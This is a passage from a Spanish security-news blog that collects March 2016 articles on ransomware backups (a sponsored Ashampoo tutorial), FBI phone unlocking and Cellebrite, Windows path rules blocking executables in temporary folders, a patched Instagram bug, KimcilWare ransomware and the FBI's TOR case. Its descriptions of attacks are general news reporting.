Thursday, 31 March 2016

Ashampoo Backup Pro 10. Última defensa contra el ransomware

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/ashampoo-backup-pro-10-ultima-defensa-contra-el-ransomware/
TAGS: Backup, branded, copia de seguridad, ransomware, restaurar archivos, Restaurar PC, seguridad informática

La única arma para defenderte de un ataque de ransomware en el que se han cifrado y bloqueado tus archivos es contar con una copia de seguridad actualizada. En esa tarea Ashampoo Backup Pro 10 será tu mejor aliado y te permitirá recuperar tu sistema operativo y archivos de forma rápida y sencilla.


apert_ashampoo-backup-pro-10



1: Asúmelo. Nadie está a salvo del ransomware


Durante los últimos meses hemos sido testigos de un incremento sustancial en la actividad y virulencia de un determinado tipo de ransomware que, lejos de intentar acceder a tu información privada para robar contraseñas o datos similares, directamente cifraba todos los archivos que contenía tu ordenador.


Por desgracia, aparte de la propia precaución del usuario, no existe un método 100% infalible para defenderse de este tipo de ataques que cada vez se hace más habitual entre todo tipo de perfiles de usuarios. Desde empresas a particulares, incluso cuando el usuario cuenta con una cierta experiencia en el uso de ordenadores.


La única forma efectiva para defenderse de este tipo de ataques es estar preparado ante la pérdida de datos, y esto sólo se consigue contando con una salvaguarda de archivos actualizada que permita formatear tu ordenador y rescatar tus datos y tu sistema operativo al completo en cuestión de segundos.


Si no cuentas con una copia de seguridad completa de tu sistema y archivos personales, te encuentras en una situación permanente de riesgo ante un hipotético ataque de este tipo de malware. En cuanto antes tomes conciencia y te prepares para hacer frente a esta amenaza, menos te afectará su ataque.




2: La importancia de una copia de seguridad


Una vez que tu equipo ha sido atacado por este tipo de ransomware, la única forma de restablecer la normalidad y recuperar tu equipo es usando una copia de seguridad actualizada, y si ésta está guardada en una ubicación externa, mejor que mejor.

Por suerte existen softwares de salvaguarda que destacan por su sencillez de uso comoAshampoo Backup Pro 10, que además de realizar salvaguarda de archivos, también permite la salvaguarda en la nube, por lo que tus archivos estarán totalmente a salvo en caso de sufrir este tipo de ataques.

Además, Ashampoo Backup Pro 10 permite realizar copias de seguridad incrementales ybackups diferenciales, lo cual permite mantener las salvaguardas siempre actualizadas y ocupando hasta un 50% de espacio menos, para que el rescate de tu ordenador sea mucho más efectivo y el impacto sea menor.

La importancia de una copia de seguridad


3: Instala Ashampoo Backup Pro 10


Existen un buen número de servicios que ofrecen de forma gratuita un determinado espacio de almacenamiento de datos en la nube como Dropbox, Google Drive, Microsoft OneDrive, etc.


Con Ashampoo Backup Pro 10 puedes utilizar este espacio para almacenar tu salvaguarda online y mejorar la seguridad de tu equipo y las opciones de rescate de tu PC tras sufrir un ataque de ransomware que bloquee todos los archivos de tu equipo.


Hacerlo es muy sencillo. Comienza descargando Ashampoo Backup Pro 10 desde su página oficial. Puedes utilizar su versión gratuita con 10 días de prueba a los que se sumarán 30 días más si te registras con tu email, o comprar su licencia de uso por un precio de 39,99 euros.




4: Crea una salvaguarda en la nube


Tras instalarlo en tu equipo, configura tu primera copia de seguridad. Es recomendable que esta sea completa, de forma que puedas restaurar fácilmente todo tu sistema operativo.

Para ello, haz clic sobre Crear nuevo plan de copia de seguridad y elige uno de los muchos servicios de almacenamiento en la nube donde quieras guardar tu salvaguarda online. Por supuesto, si prefieres guardar tu copia de seguridad en un disco duro, también lo podrás hacer seleccionando la opción Unidad local o de red, aunque en ese caso te recomendamos utilizar una unidad de almacenamiento externa para mejorar la seguridad.
Crea una salvaguarda en la nube

Después, haz clic en Siguiente y procede a autorizar el acceso de Ashampoo Backup Pro 10 al servicio de almacenamiento en la nube que has elegido.

Pulsa sobre Autorizar y se te redirigirá al sistema de autenticación del servicio online que hayas elegido.

Cuando termine el proceso, Ashampoo Backup Pro 10 te indicará que se ha realizado con éxito y ya podrá crear nuevas salvaguardas en la nube y restaurar tu equipo desde allí. Pulsa enSiguiente para continuar.



5: Configura tu Plan de copia de seguridad


Ahora, marca la opción Crear un nuevo plan de copia de seguridad y escribe un nombre para identificarlo.

A continuación, elige la opción Hacer copia de seguridad de discos enteros, particiones, discos duros o del ordenador completo. Con esto se creará la copia de respaldo que te permitirá rescatar fácilmente tu equipo completo después de un ataque de ransomware o de un fallo del sistema.
Configura tu Plan de copia de seguridad

Después, marca la unidad o partición en la que tienes instalado el sistema y continúa conSiguiente.

Puedes optar por cifrar tu salvaguarda online, para mejorar su seguridad estableciendo una contraseña para acceder a ella. Continúa con Siguiente y establece el número de salvaguardas de este tipo que se guardarán.

Dado que este tipo de copias de seguridad sirven principalmente para restaurar completamente el sistema operativo, bastará con conservar una o dos, según el espacio disponible, de forma que se vaya actualizando con cada nueva versión. Continúa la configuración pulsando consecutivamente en Siguiente para avanzar en las distintas opciones de notificación y configuración de tu copia de seguridad.
Ashampoo Backup Pro 10 iniciará la copia de seguridad

Cuando termines,Ashampoo Backup Pro 10 te mostrará un resumen de la configuración de tu plan de copia de seguridad. Si todo está correcto, pulsa en Siguiente y, a continuación, haz clic en Hacer copia de seguridad ahora.

Ashampoo Backup Pro 10 iniciará la copia de seguridad y creará una salvaguarda en la nubeque hayas elegido.



6: Mantén tus archivos a salvo


Tras realizar la copia de seguridad completa de tu disco duro completo o partición que contiene el sistema, crea una salvaguarda online para tus archivos más habituales, que son los que más cambian y los más complicados de tener siempre actualizados y a salvo.


Por suerte, Ashampoo Backup Pro 10 hace muy fácil esa tarea.


Para ello, solo necesitas crear una tarea de copia de seguridad específica para ellos, de forma que se cree una copia de seguridad de forma periódica y totalmente automática.


Haz clic sobre la opción Crear nuevo plan de copiad de seguridad y elige el destino de tu salvaguarda online, tal y como hiciste en el apartado anterior, pero en esta ocasión elige la opción Respalde una selección de archivos y carpetas y configuraciones.



Mantén tus archivos a salvo con Ashampoo Backup Pro 10

Con esta función de Ashampoo Backup Pro 10 podrás seleccionar fácilmente los archivos a respaldar ya que permite clasificarlos por tipo de archivo, por carpeta, correo electrónico, etc.


Elige el tipo de contenido que necesites respaldar y haz clic en Siguiente.


A continuación, y para optimizar el espacio necesario, elige la opción Comprimir los datos de copia de seguridad y continúa con Siguiente.


Después, establece la seguridad y la frecuencia en la que debe realizarse la copia de seguridad de esos archivos, teniendo en cuenta si los modificas a diario o es suficiente con hacer una copia a la semana.


Cuando termines la configuración de este plan de copia de seguridad se mostrará un resumen. Si todo está correcto, pulsa en Siguiente y haz clic sobre el botón Hacer copia de seguridad ahora. Ashampoo Backup Pro 10 realizará una salvaguarda de tus archivos y los guardará en el servicio en la nube que le hayas indicado.




7: Crea un disco de rescate


En caso de que tu ordenador no se inicie o que haya sido atacado por un malware, necesitarás crear un disco de rescate desde el que restaurar rápidamente tu equipo utilizando la copia de seguridad que has creado, en lugar de tener que reinstalar y configurar Windows desde cero.

Desde Ashampoo Backup Pro 10, accede al menú Disco de rescate y haz clic sobreInformación de disco de rescate.

Acto seguido se iniciará el navegador de Internet y te llevará hasta la página de Ashampoo desde donde se te facilitan instrucciones precisas y todos los archivos que necesitas para crear este soporte de rescate para tu PC y como utilizarlo en caso de fallo del sistema.

Crea un disco de rescate


8: Recupera tus archivos


Recuperar tus archivos con Ashampoo Backup Pro 10 es tan sencillo como crear las salvaguardas.


Simplemente, haz clic sobre la opción Restaurar copia de seguridad.


A continuación, se te plantean dos escenarios: si quieres restaurar algunos archivos de un plan de copia que ya está configurado y funcionando en Ashampoo Backup Pro 10, elige la opciónRestaurar una copia de seguridad de un plan de copia de seguridad instalado, y se te mostrarán los planes de copia de seguridad que tienes activos para que puedas restaurar archivos desde ellos.



Recupera tus archivos

Si, por el contrario, acabas de restaurar por completo tu equipo, y no todavía no tienes activado ningún plan, pero ya contabas con una copia de seguridad de Ashampoo Backup Pro 10, marca la opción Restaurar una copia de seguridad de algún otro lugar y, tras pulsa sobreSiguiente, selecciona su ubicación para comenzar a recuperar tus archivos.


Tras esto, se abre el archivo de copia de seguridad que contiene tus archivos y te permite seleccionar una determinada versión de los archivos, en función de la fecha y hora de recuperación que selecciones.



Marca los archivos o carpetas que quieras recuperar y Ashampoo Backup Pro 10 los recuperará.

Marca los archivos o carpetas que quieras recuperar y pulsa en Siguiente para indicar en qué ubicación de tu ordenador quieres que se guarden los archivos que se recuperen.


Por último, haz clic sobre Restaurar y Ashampoo Backup Pro 10 recuperará tus archivos personales en la ubicación que le indiques.


Puedes acceder a ellos desde Ashampoo Backup Pro 10 pulsando sobre Abrir carpeta.


Como has podido comprobar, Ashampoo Backup Pro 10 es una de las herramientas para crear copias de seguridad más sencillas de usar.


Fuente:http://computerhoy.com/






Noticias de seguridad informática

Esto es lo que tendría que hacer el FBI para hackear un Android

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/esto-es-lo-que-tendria-que-hacer-el-fbi-para-hackear-un-android/
TAGS: FBI

Las últimas noticias sobre el hackeo del iPhone 5C por parte del FBI siguen resonando todavía. ¿Qué habría pasado de intentarlo con un Android? Analizamos una serie de casos plausibles.


El asunto del culebrón entre Apple y el FBI sigue trayendo cola. Aunque parece que por ahora la guerra ha llegado a una tregua, los debates sobre si las compañías tecnológicas deberían proporcionar a los gobiernos una puerta trasera para entrar en sus dispositivos siguen muy vivos. Como ya imaginamos que sabes, todo esto forma parte de la onda expansiva mediática provocada desde el atentado de San Bernardino en diciembre de 2015, en el que murieron 14 personas y 24 resultaron heridas de gravedad. Hace poco nos enteramos de que el FBI habría conseguido entrar en el iPhone 5C de uno de los terroristas responsables con la ayuda de la empresa israelí Cellebrite, lo que sirvió para que el público no haya parado de preguntarse sobre la seguridad de Apple desde entonces.


Ahora imaginemos que el terrorista utilizase el sistema operativo móvil de la competencia. ¿Qué pasaría si el FBI hubiese querido hackear un Android? En Motherboard se han hecho la misma pregunta, y la investigación que han conducido al respecto nos va a permitir aclararlo.


Antes de entrar a comentar los resultados de la investigación, vale la pena señalar que en el mismo medio apuntan a que al menos hubo 63 peticiones de desbloqueo de iPhones y terminales Android -nueve de los cuales ejecutaban el sistema operativo del robot verde- en el pasado, según la American Civil Liberties Union. En todos ellos se alegó que los motivos para iniciar una investigación federal tenían que ver desde con cargos menores por tráfico de drogas, a casos más graves relacionados con la pornografía infantil.


Google Nexus 5XGoogle Nexus 5X



¿Cómo podría el FBI acceder a un terminal Android?


Lo primero que hicieron los investigadores fue revisar la documentación sobre el cifrado de disco de Android. Hay que tener en cuenta que el cifrado de datos en los smartphones implica que exista una clave de desbloqueo que crea el propio teléfono. Esta contraseña se consigue combinando un código definido por el usuario y un número largo y complicado, específico del dispositivo individual que se utiliza.


Las vías de ataque posibles que quedan pasan por tratar de intervenir el terminal por fuerza bruta, lo que es altamente complicado. Sin embargo, en ocasiones acceder a los datos cifrados de un teléfono no requiere romper ningún código. Para ello, se apunta a los siguientes casos plausibles:



  • Se puede instalar una aplicación creada expresamente en un teléfono objetivo con el objeto de extraer información. Google habría hecho algo similar en 2011 cuando envió un parche a los Nexus para limpiar malware de forma remota, aunque no se sabe si esto sigue siendo posible.

  • Muchas apps utilizan el API de copia de seguridad de Android. Esto significa que hay un respaldo de la información, y que se puede acceder a ella desde la web de la propia copia de seguridad.

  • Si los datos se almacenan en una tarjeta SD externa puede que no estén cifrados. Sólo las versiones más recientes de Android permiten cifrar tarjetas de memoria extraíbles.

  • Si el teléfono tiene un sistema de desbloqueo por huella digital, siempre y cuando se consiga una imagen de la huella del usuario se puede usar para acceder a la información almacenada.

  • En el caso de que el terminal haya sido rooteado la seguridad estará probablemente debilitada, lo que facilita la tarea de acceder a los datos.

Si ninguna de estas opciones está disponible, entonces no queda más remedio que intentar entrar por la fuerza.


https://www.youtube.com/watch?v=P-b0PcEpg9g

Estas son las posibilidades de éxito de un ataque por fuerza bruta


Hay dos formas de realizar un ataque por fuerza bruta: online y offline. En ocasiones es más fácil hacerlo de forma offline, ya que basta con copiar los datos del dispositivo en un ordenador más potente y usar software especializado y otras técnicas con las que probar distintas combinaciones de claves.


Por otra parte, los ataques offline pueden ser más costosos. Para realizarlos sería necesario probar con cada posible clave de cifrado existente o, si no es posible, intentar descubrir la contraseña del usuario y después la específica del dispositivo. Este proceso podría llevar, en total, una cantidad de tiempo absurdamente alta. Estamos hablando de miles de millones de años.


Esto deja el ataque online como única posibilidad. Si se dispone de la clave específica del dispositivo, se reduce mucho el tiempo de desbloqueo si solo es necesario descifrar la contraseña definida por el usuario. Por otra parte, el teléfono podría estar protegido contra ataques online. Este tipo de protección iría desde un tiempo entre cada intento de desbloquear el teléfono, al borrado total de la memoria del dispositivo tras un número de intentos.


Dispositivo Android en proceso de cifradoDispositivo Android en proceso de cifrado / Tony Webster editada con licencia CC BY-SA 2.0



Desbloquear un Android protegido: sólo con software MDM


Según se recoge, el dispositivo utilizado para realizar las pruebas fue un Nexus 4 con Android 5.1.1 Lollipop y el cifrado de disco activado. En primer lugar se intentó entrar introduciendo códigos por fuerza bruta, lo que después de cinco intentos colocaba un contador de 30 segundos en la pantalla. Después de otros cinco fallos se pidió al equipo que reiniciara el teléfono, y cuando se habían producido 30 fallos en total la memoria se borró por completo.


¿Cómo podían entrar en el dispositivo entonces? La única forma sería emular la herramienta de administración remota que algunos iPhone tienen instalada, lo que se conoce como mobile device management o MDM. Para emular esta herramienta, construyeron la suya propia para Android y verificaron que se podía resetear la contraseña de desbloqueo del usuario sin que este lo supiese.


Y aún así, la investigación de Motherboard no pretende sentar cátedra, sólo aproximarse a cómo el FBI podría ingeniárselas para romper las protecciones de cifrado de un terminal Android.


Borrado de datos en un recovery de AndroidBorrado de datos en un recovery de Android / stwn editada con licencia CC BY-SA 2.0



¿Por qué el FBI no quiere revelar sus técnicas de hackeo?


Que el FBI usa exploits y se aprovecha de vulnerabilidades informáticas en sus investigaciones esvox populi. Lo que no es tan conocido son los métodos que utilizan para llevarlas a cabo. Es lógico que la agencia federal quiera proteger sus técnicas de hackeo para futuras investigaciones, igual que no quiere ofender a las terceras partes que les asisten o a otros gobiernos que quieran usar las mismas tecnologías. Esto ha quedado bastante claro con el caso de Cellebrite.


El año pasado el FBI hizo uso de estas técnicas secretas cuando se apoderó de la web de pornografía infantil Playpen y la mantuvo en sus servidores durante 13 días. Durante este período se dedicó a identificar a los usuarios que la visitaban usando una herramienta de investigación de red específica, y en ningún momento reveló cómo consiguió el exploit parahackear la web y a sus usuarios.


Todo este secretismo plantea una pregunta importante: Si el FBI conoce una vulnerabilidad de un programa que afecta a los usuarios y el desarrollador no es consciente de la misma, ¿debería revelarla al público en algún momento? El gobierno estadounidense es muy claro en este aspecto: a no ser que se trate de una amenaza muy seria para la seguridad nacional, o de una necesidad imperiosa de las fuerzas de la ley, es la propia agencia la que decide si debe hacerlo o no.


Mientras el FBI siga usando técnicas sofisticadas de hacking para hacer cumplir la ley y mientras siga recurriendo a terceras partes para ello, es casi seguro que todo el asunto seguirá siendo un secreto.


Source:http://www.malavida.com/


Noticias de seguridad informática

Cellebrite, tecnología forense israelí al servicio del FBI contra Apple

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/seguridad-movil/cellebrite-tecnologia-forense-israeli-al-servicio-del-fbi-contra-apple/
TAGS: FBI, iPhone

Según los últimos rumores sobre el caso de Apple y el FBI, la empresa israelí Cellebrite habría ayudado a obtener los datos del terminal del terrorista de San Bernardino. Analizamos qué papel juega en este asunto.


El pasado mes de febrero aquí en Malavida publicamos que una juez federal obligó a Apple a colaborar con el FBI. El objetivo de dicha colaboración era descifrar el iPhone 5C de uno de los terroristas que atentaron en San Bernardino (California) el 2 de diciembre de 2015. Este atentado se saldó con 14 muertos y 24 heridos de gravedad. El FBI quería conseguir acceso al teléfono para saber hasta qué punto el terrorista pudo haber estado influido por grupos radicales, y Apple —más en concreto Tim Cook— no estaba por la labor de facilitar el acceso a la información del terminal.


Según se ha podido saber gracias a Reuters, el FBI a día de hoy ya habría recibido ayuda para acceder a los datos del iPhone del terrorista. No está claro cómo lo habrían hecho, pero según la agencia de noticias el éxito de este hack habría dependido en gran medida de la empresa israelí Cellebrite.



Cellebrite, especialistas en extracción forense de datos


Si echamos un vistazo a la web oficial de Cellebrite esa es la conclusión más rápida a la que vamos a llegar. La empresa se fundó en 1999 en Israel, y cuenta con filiales en Estados Unidos y Alemania. Su producto estrella es el análisis forense de dispositivos móviles, para lo que crearon en 2007 una línea de productos conocida como Universal Forensic Extraction Device o UFED.


App Store en un iPhone 6App Store en un iPhone 6


Estos productos de extracción de datos se venden sólo a gobiernos y organizaciones corporativas previamente aprobados. También cuenta con la cobertura más amplia de todo el mercado, y en junio de 2012 podía extraer datos de un total de 8.200 dispositivos.


Todo este volumen de aparatos incluyen PDAs, teléfonos móviles, navegadores GPS y tablets. UFED puede extraer, descifrar y analizar todo tipo de contenidos: contactos, mensajes de texto, registros de llamadas, números de serie electrónicos, números IMEI e información de localización de la tarjeta SIM.


Hoy por hoy, las técnicas de análisis de Cellebrite llegan hasta iOS, BlackBerry, Android, Symbian y Nokia BB5. Aseguran que han sido de los primeros en la industria del análisis forense móvil en haber conseguido entrar en distintos dispositivos inteligentes, incluyendo la extracción de la memoria flash de BlackBerry, el sorteo del bloqueo por patrón de Android y el descifrado de datos y descodificado de los navegadores TomTom.


BlackBerry tampoco se resiste a CellebriteBlackBerry tampoco se resiste a Cellebrite



¿Qué papel juega Cellebrite en el caso de Apple y el FBI?


¿Está realmente Cellebrite ayudando al FBI en el descifrado del iPhone 5C del terrorista? No tenemos forma de saberlo. Lo que sí se está manejando es rumorología pura y dura mezclada con especulación, o al menos es lo que se desprende del artículo de Reuters. Por otra parte, no podemos evitar ser escépticos con esta información.


Según se puede leer en NPR, la agencia federal estadounidense sólo ha comentado que no puede comentar nada sobre la identidad de terceras partes que les asistan. Según se recoge, Cellebrite habría comentado a otros medios que ha trabajado con el Departamento de Justicia de Estados Unidos, pero poco más.


En un principio, se apuntó a que esto podría ser una maniobra publicitaria orquesada de manera brillante por la empresa israelí.


christopher


Y sin embargo, puede que sí exista algún tipo de información que pueda confirmar que Cellebrite colabora con el FBI. Según se publicó en BGR, se habría visto un contrato por más de 15.000 dólares que relaciona directamente a Cellebrite y a la agencia federal.


zen


De lo que no tenemos constancia es de información acerca de los métodos usados por la agencia federal. Los abogados de Apple indicaron que les gustaría conocer el método que han seguido los federales para entrar en el iPhone, aunque hay una alta probabilidad de que el FBI decida mantener en secreto tanto la identidad de sus asistentes, como el método utilizado.



El clonado de chips podría haber sido la clave


Que no existan declaraciones oficiales sobre qué metodos se han usado no significa que no hayan surgido distintas teorías en torno a este aspecto. Hoy por hoy, la que más fuerza está cobrando es la del clonado de chips de memoria, también conocida como “trasplante”, según recogen en NPR. Lo que se hace es eliminar la capa de soldadura del chip NAND de la placa base del teléfono e insertarlo en un lector de chips específico.


A través de este lector se puede almacenar datos del chip de memoria y acerca del propio chip. Después esta información se copia en un archivo y se copia en otro dispositivo NAND similar. A partir de aquí, todo se basa en realizar ataques de fuerza bruta sin miedo a que la memoria dispare su método de protección automático que la borra por completo. Y en caso de que pase algo así, gracias al clonado tienen la posibilidad de transplantar el archivo tantas veces como sea necesario.


Esta misma tecnología es la que se utilizó en un centro comercial chino para ampliar la memoria de un iPhone de 16 GB a 128, y que se puede ver en el siguiente vídeo:


https://www.youtube.com/watch?v=2bGb5AOwp44#t=11



A partir de aquí, que cada uno saque sus propias conclusiones. No hay forma de saber si es una maniobra publicitaria o si Cellebrite realmente colabora con el FBI, sólo rumores. Lo que sí está claro es que Cellebrite tiene la tecnología necesaria para asistir a la agencia federal. Su reputación como empresa de análisis forense de datos móviles le precede, y si alguien puede romper el cifrado del iPhone sin la ayuda de Apple son ellos.

De hecho, vale la pena mencionar que la empresa israelí menciona en su página web de forma muy específica que tienen una “capacidad única” para desbloquear dispositivos iOS 8.X de una manera totalmente forense sin intervenir el hardware o riesgo de borrado de memoria. Curiosamente, no existe mención sobre si sus métodos también funcionan con iOS 9.X, que sería el sistema operativo del iPhone 5C del terrorista.




Noticias de seguridad informática

Cómo protegerte del 90% del ransomware sin necesidad de un antivirus

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/malware-virus/como-protegerte-del-90-del-ransomware-sin-necesidad-de-un-antivirus/
TAGS: ransomware

No podemos negar que le ransomware es, a día de hoy, el tipo de malware más peligroso de toda la red. Este malware, que por desgracia ha ganado un gran protagonismo en los últimos años, cifra los datos personales de sus víctimas de manera que, para poder recuperarlos, la víctima debe pagar un “rescate” por ellos o, de lo contrario, se perderán para siempre. El complejo funcionamiento de un ransomware hace que sea muy complicado de detectar por los sistemas antivirus, incluso utilizando el análisis por comportamiento, por lo que, aunque tengamos un antivirus actualizado a la última versión, no podemos estar seguros de evitar una infección.


La mayoría del malware, por lo general, está basado en otro malware, por lo que muchas veces el comportamiento de este es muy similar al de otros. Obviamente, con el ransomware pasa lo mismo. Este tipo de malware suele ejecutarse casi siempre desde una lista de directorios temporales y trabaja en ellos para obtener la clave y generar los ficheros necesarios para la comunicación con el servidor. Por lo tanto, si bloqueamos los permisos sobre dichos directorios, el ransomware no podrá ejecutarse, quedando nuestro sistema protegido.


Para bloquear el acceso a estos directorios vamos a aprovechar las directivas de seguridad de Windows. Para ello, abrimos el Panel de Control y en el apartado de Sistema y Seguridad > Herramientas administrativas buscaremos la Directiva de Seguridad Local.


En esta ventana seleccionamos la ruta “Reglas adicionales” y, en el apartado central, pulsamos con el botón derecho debajo de las dos reglas existentes por defecto y elegimos “Regla de nueva ruta de acceso” para crear, una a una, las siguientes entradas:


Directivas de seguridad local en Windows



  • %AppData%\*.exe – “No permitido”

  • %AppData%\*\*.exe – “No permitido”

  • %LocalAppData%\*.exe – “No permitido”

  • %LocalAppData%\*\*.exe – “No permitido”

  • %ProgramData%\*. exe – “No permitido”

  • %Temp%\*.exe – “No permitido”

  • %Temp%\*\*.exe – “No permitido”

  • %LocalAppData%\Temp\*.zip\*.exe – “No permitido”

  • %LocalAppData%\Temp\7z*\*.exe – “No permitido”

  • %LocalAppData%\Temp\Rar*\*.exe – “No permitido”

  • %LocalAppData%\Temp\wz*\*.exe – “No permitido”

  • %ProgramData%\*. exe – “No permitido”

Crear nueva directiva de seguridad en Windows para proteger del ransomware


Una vez creadas todas las reglas reiniciamos el ordenador para que se apliquen correctamente y listo. En caso de ser víctima de una amenaza cuyo binario se ejecute desde alguna de las rutas anteriores, esta quedará automáticamente bloqueada, asegurando nuestros datos y evitando un mal mayor.


Esta medida de seguridad no solo afecta al ransomware, sino que también será eficaz con todo el malware (virus, troyanos, etc) que se intente ejecutar desde cualquiera de las rutas anteriores.



Este sistema de protección contra el ransomware no es perfecto


Como hemos indicado en el título del artículo, este sistema nos protegerá aproximadamente del 90% de las amenazas, sin embargo, hay otras herramientas maliciosas que se ejecutan desde otros directorios, por lo que la protección nunca va a ser del 100%.


También indicar que bloquear los permisos sobre estos directorios puede hacer que algunas aplicaciones no se ejecuten correctamente. Tal como indica la fuente, un ex-miembro de 21A Labs, de más de 300 aplicaciones probadas solo ha dado problemas Spotify, nada grave teniendo en cuenta que podemos copiar su carpeta a otro directorio y este seguirá funcionando sin problemas de forma portable.


Recordamos que, para prevenir, debemos tener siempre una copia de seguridad de nuestros archivos.


Queremos agradecer al ex-miembro anónimo de 21A Labs por compartir con nosotros, en SoftZone, esta configuración.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

Un fallo permitía hackear cuentas de Instagram fácilmente

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/vulnerabilidades/un-fallo-permitia-hackear-cuentas-de-instagram-facilmente/
TAGS: facebook, Instagram

Hace solo unos minutos te contábamos que Instagram parece haber escuchado finalmente a los usuarios y no cambiará la forma en la que nos muestra las fotografías, pero ahora se ha encontrado de frente con una importante vulnerabilidad que permitiría hackear cuentas de Instagram.


Esta no es la primera ni la última plataforma social que se enfrenta a una grabe vulnerabilidad, aunque esta vez parece que la cosa ha sido controlada rápidamente. Un fallo encontrado en la red social Instagram más popular de selfies expuso las cuentas de miles de usuarios, aunque Facebook ha aplicado su magia y no ha tardado en solucionarlo.



Un fallo en Instagram permitía hackear miles de cuentas


Arne Swinnen, un investigador experto en seguridad informática ha descubierto un importante fallo en la red social ahora propiedad de Mark Zuckerberg. Este bug en Instagram permitía a un potencial atacante hacerse con las cuentas de millones de usuarios, después de saltarse varios procesos de verificación que, en la mayoría de casos, no servían absolutamente para nada.


La habilidad y la pericia de este hacker ha hecho que Facebook le page unos 4.500 euros por los servicios prestados, ya que de haberse difundido de forma privada, podría haber expuesto la información privada de millones de usuarios de la plataforma. En su blog personal, "Arne Swinnen's Security Blog", podemos encontrar toda la información del proceso.


El error fue encontrado en el proceso de reactivación de una de las cuentas de Instagram del hacker, dónde encontró que varios datos sensibles de los usuarios son impresos en el código fuente de la página, sin ningún tipo de seguridad.


Imagen - Un fallo permitía hackear cuentas de Instagram fácilmente


Gracias a estos datos y con mucha habilidad, este hacker consiguió acceder a las opciones de recuperación de miles cuentas en Instagram, que en la gran mayoría de casos no disponían de unas medidas de recuperación lo suficientemente seguras.


Gracias al pronto aviso, Facebook no ha tardado ni un día en parchear la vulnerabilidad de Instagram, que ya se ha hecho pública y se considera como una anécdota más de la plataforma.


Como podemos ver, es tan importante mantener una contraseña segura en nuestras cuentas a través de Internet, como crear preguntas de seguridad con una complejidad lo suficientemente elevada como para evitar que un hacker las descifre fácilmente.


Fuente:http://www.elgrupoinformatico.com/


Noticias de seguridad informática

Wednesday, 30 March 2016

KimcilWare, un nuevo ransomware enfocado a secuestrar tiendas online

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/tecnologia/kimcilware-un-nuevo-ransomware-enfocado-secuestrar-tiendas-online/
TAGS: KimcilWare

El ransomware es el tipo de malware más peligroso de los últimos años. Este tipo de software malicioso ataca lo más importante para los usuarios: sus datos. Cuando la infección se lleva a cabo, todos los datos del usuario se cifran con un algoritmo irrompible y se pide el pago de un “rescate” a cambio de la clave de cifrado con la que poder recuperar estos archivos. Los objetivos de esta amenaza, que principalmente han sido los usuarios domésticos, también cambian en ocasiones, pudiendo encontrar alternativas como KimcilWare cuyos objetivos son los servidores de páginas web.


KimcilWare es un nuevo ransomware detectado en las últimas horas por los investigadores de seguridad de MalwareHunterTeam cuyo principal objetivo es el de secuestrar los servidores de diferentes tiendas online, generalmente basadas en Magento, para luego pedir el correspondiente rescate por ellas.


Cuando este ransomware infecta el servidor, este añade la extensión “.kimcilware” a todos los ficheros del mismo. Para que la página web siga funcionando, el malware genera su propio fichero index con el que muestra una pantalla en negro con un texto que indica que el servidor ha sido secuestrado. El pirata informático pide el pago de 140 dólares, obviamente en Bitcoin, por la clave de cifrado con la que recuperar los archivos.


Servidor secuestrado por el ransomware kimcilware


Por el momento no se sabe cómo se ha podido llevar a cabo la infección. A día de hoy se conocen más de 10 tiendas afectadas por este ransomware, sin embargo, no se sabe cómo las elige el pirata informático. Mientras que la infección podría realizarse mediante una vulnerabilidad en el servidor o en Magento, algunos servidores que alojan varias tiendas online solo han visto comprometidas una de ellas, lo que hace pensar que el pirata informático ataca objetivos concretos y no va solo “a ver qué encuentra”.


Los investigadores de seguridad siguen estudiando este nuevo y hasta ahora desconocido (aunque la primera infección data del 3 de marzo de este mismo año) ransomware, así como intentando encontrar un fallo en la seguridad del mismo que brinde información sobre el pirata informático responsable o que permita descifrar los archivos sin tener que pasar por caja.



KimcilWare es, probablemente, una variante más del ransomware libre Hidden Tear


Uno de los investigadores de seguridad que se encuentran investigando esta nueva amenaza ha detectado que la dirección de correo del pirata informático, tuyuljahat@hotmail.com, coincide con la de otro ransomware descubierto hace algún tiempo, MireWare. Debido a que este ransomware era una variante de Hidden Tear, es muy probable que el nuevo KimcilWare también lo sea, aunque, a diferencia del primero, este esté enfocado principalmente a tiendas Magento.


Debido a la falta de información, por el momento, las únicas recomendaciones de seguridad que se pueden dar para intentar mitigar esta amenaza es recomendar el uso de contraseñas seguras tanto en el servidor como en el panel de administración de Magento, así como mantener todo el núcleo de la tienda actualizado para evitar que, si la infección de realiza a través de una vulnerabilidad, esta pueda estar comprometiendo nuestro servidor.


Fuente:http://www.redeszone.net/


Noticias de seguridad informática

El FBI se opone a una decisión judicial que le obliga a revelar como hackeó TOR

SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/importantes/el-fbi-se-opone-una-decision-judicial-que-le-obliga-revelar-como-hackeo-tor/
TAGS: FBI, TOR

Mientras que por un lado el FBI ha tratado que la justicia le diera la razón a la hora de obligar a Apple a desbloquear el iPhone de los terroristas de San Bernardino, toma una postura totalmente contraria tras la decisión de un juez federal de revelar cómo funciona el software empleado para hackear la red TORpara rastrear a más de 1.000 usuarios el año pasado. Si no tiene éxito en sus exigencias, el Departamento de Justicia tendrá que acatar la decisión del juez y obligar a la agencia federal a desentrañar los secretos y técnicas informáticas de las cuales se han valido.


Navegar en Internet significa volcar a la red información al respecto de nuestra propia conexión a la red, sistema operativo empleado, dirección IP e incluso ubicación física desde la cual accedemos a Internet. Aunque hay muchos usuarios que no dan mayor trascendencia a este hecho, otros tantos prefieren preservar la privacidad y el anonimato en sus conexiones y evitar que terceros puedan tener un acceso tan sencillo a esta información.


Con la red anónima TOR se subsana parte de ese problema ya que permite acceder a la Deep Web sin que dejemos un rastro acerca de nuestra identidad y datos de sesión…o eso es que lo que se pensaba hasta que el FBI metió las narices el pasado año en esta red. La polémica es doble al igual que sucede en el caso del terrorista y vuelve a sacar a la palestra el argumento de “el fin justifica los medios”. El año pasado, más de 1.000 ordenadores fueron rastreados una vez que el FBI consiguió hackear la red TOR, que dejó de ser anónima y permitió la identificación y captura de personas acusadas de delitos de pornografía infantil.


Tor



El FBI podría haber pagado 1 millón de euros para piratear TOR


